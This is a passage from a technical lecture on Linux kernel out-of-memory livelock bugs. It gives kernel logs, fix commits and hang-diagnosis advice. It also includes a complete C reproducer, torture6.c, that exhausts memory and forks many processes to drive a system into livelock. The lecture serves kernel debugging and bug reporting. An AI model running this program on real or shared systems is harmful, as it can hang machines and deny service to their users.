[   61.528068] Node 0 DMA32 free:0kB min:5200kB low:6500kB high:7800kB active_anon:1167280kB inactive_anon:8196kB active_file:42608kB inactive_file:439424kB unevictable:0kB isolated(anon):0kB isolated(file):128kB present:2080640kB managed:1775332kB mlocked:0kB dirty:436344kB writeback:3288kB mapped:39260kB shmem:8452kB slab_reclaimable:21908kB slab_unreclaimable:33120kB kernel_stack:20976kB pagetables:9536kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:11073180 all_unreclaimable? yes
[   61.528069] lowmem_reserve[]: 0 0 0 0
[   61.528072] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   61.528074] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   61.528075] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[   61.528075] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   61.528076] 123086 total pagecache pages
[   61.528076] 0 pages in swap cache
[   61.528077] Swap cache stats: add 0, delete 0, find 0/0
[   61.528077] Free swap  = 0kB
[   61.528077] Total swap = 0kB
[   61.528077] 524157 pages RAM
[   61.528078] 0 pages HighMem/MovableOnly
[   61.528078] 76348 pages reserved
[   61.528078] 0 pages hwpoisoned
[   61.528079] SLUB: Unable to allocate memory on node -1 (gfp=0x2088020)
[   61.528080]   cache: kmalloc-64, object size: 64, buffer size: 64, default order: 0, min order: 0
[   61.528080]   node 0: slabs: 3218, objs: 205952, free: 0
[   61.528085] file_io.00: page allocation failure: order:0, mode:0x2200020
[   61.528086] CPU: 0 PID: 4457 Comm: file_io.00 Not tainted 4.5.0-rc7+ #45
---------- Example output end ----------

Although an interim fix, for now we made sure that we do not deplete memory reserves by commit 78ebc2f7146156f4 ("mm,writeback: don't use memory reserves for wb_start_writeback").

It was lucky that this problem was found before the OOM reaper is accepted, for, if the OOM reaper prevented the OOM livelock situation from occurring, we cannot reproduce this problem, and this problem is considered as non-existent. Regarding problems caused by Linux kernel's memory management subsystem, since identifying criminal person and turning over by yourself is especially strongly required, we can't expect addressing unreproducible problems.

May 2016  OOM livelock situation caused by a bug in down_write_killable()

There was a bug in down_write_killable() operation, which was introduced in order to reduce possibility for the OOM reaper to fail to reclaim memory, which is a variant of down_write() that can be interrupted by SIGKILL signal, and resulted in OOM livelock situation. Nobody has noticed this bug for one month after the patch was accepted to linux-next which was (as of that moment) a development version towards Linux 4.7-rc1. (Once again, the OOM situation is not tested that enough.)

---------- torture6.c ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/wait.h>

static int memory_eater(void *unused)
{
        char *buf = NULL;
        unsigned long size = 0;
        while (1) {
                char *tmp = realloc(buf, size + 4096);
                if (!tmp)
                        break;
                buf = tmp;
                buf[size] = 0;
                size += 4096;
                size %= 1048576;
        }
        kill(getpid(), SIGKILL);
        return 0;
}

static void child(void)
{
        char *stack = malloc(4096 * 2);
        char from[128] = { };
        char to[128] = { };
        const pid_t pid = getpid();
        unsigned char prev = 0;
        int fd = open("/proc/self/oom_score_adj", O_WRONLY);
        write(fd, "1000", 4);
        close(fd);
        snprintf(from, sizeof(from), "tgid=%u", pid);
        prctl(PR_SET_NAME, (unsigned long) from, 0, 0, 0);
        srand(pid);
        snprintf(from, sizeof(from), "file.%u-0", pid);
        fd = open(from, O_WRONLY | O_CREAT, 0600);
        if (fd == EOF)
                _exit(1);
        if (clone(memory_eater, stack + 4096, CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL) == -1)
                _exit(1);
        while (1) {
                const unsigned char next = rand();
                snprintf(from, sizeof(from), "file.%u-%u", pid, prev);
                snprintf(to, sizeof(to), "file.%u-%u", pid, next);
                prev = next;
                rename(from, to);
                write(fd, "", 1);
        }
        _exit(0);
}

int main(int argc, char *argv[])
{
        if (chdir("/tmp"))
                return 1;
        if (fork() == 0) {
                char *buf = NULL;
                unsigned long size;
                unsigned long i;
                for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                        char *cp = realloc(buf, size);
                        if (!cp) {
                                size >>= 1;
                                break;
                        }
                        buf = cp;
                }
                /* Will cause OOM due to overcommit */
                for (i = 0; i < size; i += 4096)
                        buf[i] = 0;
                while (1)
                        pause();
        } else {
                int children = 1024;
                while (1) {
                        while (children > 0) {
                                switch (fork()) {
                                case 0:
                                        child();
                                case -1:
                                        sleep(1);
                                        break;
                                default:
                                        children--;
                                }
                        }
                        wait(NULL);
                        children++;
                }
        }
        return 0;
}
---------- torture6.c ----------

This bug was fixed by commit 04cafed7fc19a801 ("locking/rwsem: Fix down_write_killable()").

July 2016  Memory depletion when performing swap out operation via dm-crypt

Since swapping out is considered as an operation for making free memory, allocation requests for performing swap out operation are allowed to allocate memory from memory reserves.

Linux 4.6 and later kernels include commit f9054c70d28bc214 ("mm, mempool: only set __GFP_NOMEMALLOC if there are free elements") in order to prevent threads with TIF_MEMDIE flag set from being blocked forever inside mempool_alloc(). But this patch was not prepared for being called from memory reclaim operations. As a result, the system became unresponsibive due to depletion of memory reserves because dm-crypt allocates memory for encrypting data which are supposed to be swapped out in order to make free memory when dm-crypto is used for swap device.

Since the OOM reaper was added in Linux 4.6, and currently we are trying to prove that the OOM livelock situation cannot occur as long as the OOM killer can be invoked, this patch was reverted by commit 4e390b2b2f34b8da ("Revert "mm, mempool: only set __GFP_NOMEMALLOC if there are free elements"").


Chapter 7   Closing: Suspect the MM subsystem when your Linux system hung up!?


The possibility of hanging up the system when the OOM killer was able to be invoked has been reduced. But the possibility of hanging up the system without invoking the OOM killer still remains. Therefore, my conclusion from this experience is that user's expectation that "The OOM killer is invoked in order to solve out of memory situation when the system entered into out of memory situation." is currently an illusion.

Many years ago, since when SELinux became enforcing mode by default, there was a tendency that "suspect SELinux when something went wrong with application's behavior".

When SELinux is the cause, we can try whether the problem is solved by disabling SELinux. But when the behavior of memory management subsystem under out of memory is the cause, we cannot try whether the problem is solved by not using the memory management subsystem.

Since the behavior of memory management subsystem under out of memory depends on system configuration/usage and timing, it is impossible to test all possibilities at development stage. We need to get feedback when a problem occurred in the end user's environment. But since the memory management subsystem does not allow users to tell that "something unexpected situation is occurring" (in other words, there is no mechanism for proving that the memory management subsystem is innocent), it is impossible to suspect the memory management subsystem. Let alone getting feedback from the end users.

I'm sorry for system administrators and technical staff at support center who are bothered by system hangups, but the situation encountering unsolvable challenges in the CTF games will last for the meantime.


7.1 Messages to audiences

Troubles are constantly reported to linux-mm mailing list.

It seems that the memory management subsystem in the Linux kernel is a mass of optimism and heuristics. Never swallow comments in the source code and/or change logs. Suspect, suspect and suspect. What are preconditions? How worst situation is the code prepared for? There is no shortage of suspect.

The "too small to fail" memory-allocation rule still exists. Also, there are "not too small" problems which cannot fail. In this lecture, you glimpsed the dark side of Linux kernel's memory management. Why don't you challenge these horribly difficult problems?

Let's overcome the barrier of divisions!

In the LSF/MM summit held this April, it seems that there was a discussion about an overhaul of GFP flags (which is the cause of impossible to win games). Since I am neither a memory management person nor a filesystem development person, I do not understand details of the discussion (i.e. behavior inside respective subsystems). But it seems to me that the discussion is revealing how poorly knowledge is shared between the provider side and the user side. It is pity that workarounds which can be backported to older kernels are completely ignored, but the Linux kernel developer's community has started some challenge.

In the real world, I feel that rigid organizations are becoming more and more failing to think about other divisions. Even within the same division, I feel that "That is not my role!" attitude is spreading as an excuse for ducking issues. As if to add insult to injury, in the name of security, I feel that the trend in the direction of forbidding even share/think about problems as organizations is getting stronger.

I believe that, like filesystem developers and memory management developers started discussions for solving problems, we need to provide mental space for communication without constraint in the real world. My way is that, not for getting a favorable settlement on daily negotiations, but for solving years-standing problems, "think various possibilities" (a bit of imagination and attentiveness) moves things forwards.


7.2 References: Hints for obtaining information when your Linux system hung up

In the virtualized environments, memory dump is an alternative to kdump.

Regarding Linux systems running as a guest of virtualized environments (e.g. KVM and VMware), you can obtain memory dump of that guest using hypervisor's functionality. Since taking memory dump does not involve kernel panic, you can obtain multiple memory dumps, and check how situation changed over time. Therefore, when your Linux guest system hung up, you can increase possibility of solving problems by taking guest's memory dump for multiple times before rebooting the guest.

Configure serial console and/or netconsole.

Linux kernel does not print any messages when a hang up caused by behavior of memory management subsystem. Therefore, you need to obtain information using e.g. memory dumps and/or SysRq.

Check memory usage using SysRq-m.

By configuring serial console and/or netconsole, you can check memory usage. If free: is below min:, OOM livelock situation is suspected.

Check threads doing memory allocation using SysRq-t.

By configuring serial console and/or netconsole, you can check threads doing memory allocation. If there are many threads reporting "__alloc_pages_nodemask" line, OOM livelock situation is suspected.

Watch out for current value of /proc/sys/kernel/hung_task_warnings file.

Since the default value of /proc/sys/kernel/hung_task_warnings is 10, it is common that the value drops to 0 before actual problems occurs and fails to capture messages when an actual problem occurred.

In order to capture kdump, configure the watchdog to trigger kernel panic rather than reboot if possible.

Some watchdogs allow configuring the action to take upon timeout. You can increase possibility of solving problems by taking kdump before reboot when your system hung up.

Try operating procedures before you encounter actual problems.

Like I wrote in a serial OSS column: To invite peaceful night (written in Japanese), I think that whether you prepared and practiced before you encounter problems makes the big difference.